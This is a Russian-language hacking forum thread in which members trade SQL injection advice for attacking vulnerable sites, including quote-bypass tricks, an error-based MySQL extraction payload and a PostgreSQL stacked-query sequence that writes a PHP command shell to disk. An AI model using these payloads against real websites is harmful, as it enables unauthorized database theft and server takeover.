Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    а сам
    должен быть в кавычках, и это никак не обойти?
     
    _________________________
  2. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    390
    Likes Received:
    48
    Reputations:
    11
    если я правильно понял что ковычки не нужны,попробуй
    Code:
    \'1.php\'
     
  3. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    792
    Likes Received:
    349
    Reputations:
    120
    а что ты сделать хочешь?
    если load_file, то можно захексить. если into outfile, то нельзя.
     
    2 people like this.
  4. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    ты уверен что там версия mysql >= 5 ?
     
    _________________________
  5. brain

    brain Elder - Старейшина

    Joined:
    4 Jul 2010
    Messages:
    251
    Likes Received:
    90
    Reputations:
    33
    Sql Version:4.1.25-log
     
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    там нету information_schema
     
    _________________________
    1 person likes this.
  7. brain

    brain Elder - Старейшина

    Joined:
    4 Jul 2010
    Messages:
    251
    Likes Received:
    90
    Reputations:
    33
    как быть?(что почитать? на ачате все прочитал) курю про инъекции уже 2-ой день, чет хреноватенько получается.. не мой профиль
     
  8. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    узнать имена таблиц не получится, тока брут
     
    _________________________
    3 people like this.
  9. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    Вопрос: допустим имеется следующий SQL запрос: UPDATE news SET some_var = var+1 WHERE news_id=27. Уязвимым параметром является news_id. Что и как мне можно из этого выжать? =)
     
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    http://devteev.blogspot.com/2010/02/sql-injection-insert-update-delete-etc.html
     
    _________________________
  11. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    В моем случае уязвимый параметр стоит в запросе после WHERE, что, как мне кажется, существенно ограничивает мои возможности...
     
  12. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,599
    Likes Received:
    1,308
    Reputations:
    1,557
    where 'sqli'
    sqli='and (1)=(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)-- x
     
    3 people like this.
  13. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    M_script, как такие запросы строить? в какой статье можно прочитать?
     
    _________________________
  14. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,158
    Likes Received:
    423
    Reputations:
    231
    Например тут
     
    1 person likes this.
  15. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,037
    Likes Received:
    531
    Reputations:
    935
    Или тут.
     
    _________________________
    2 people like this.
  16. BaleHoK

    BaleHoK Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    391
    Likes Received:
    21
    Reputations:
    10
    Перелопатил пол инета,ответ так и не нашел...Postgres >8 версия,рут...можно ли вывести все бд как в масе?
     
  17. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Вот че в нете нашел:
    PHP:
    ?a=1;CREATE TABLE shell (a text);
    ?a=1;INSERT INTO shell(a) VALUES ('<? pasthru($_GET[cmd]); ?>');
    ?a=1;COPY shell (a) TO shellaaaa;
    ?a=1; DROP TABLE shell;
     
  18. BaleHoK

    BaleHoK Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    391
    Likes Received:
    21
    Reputations:
    10
    Это и на ачате есть...мне не интересно выполнение команд...ибо скрипты и sql разнесены по сервакам...мне нужен аналог information_schemata как в mysql...существует ли он для постгрес
     
  19. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Копай в строну pg_tables.
     
  20. BaleHoK

    BaleHoK Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    391
    Likes Received:
    21
    Reputations:
    10
    Прежде чем это написать не поленился бы и посмотрел для каких это версий..это было в старых постгрес..если не изменяет память <=7 версии

    Вопрос по прежнему актуален
     
Loading...
Thread Status:
Not open for further replies.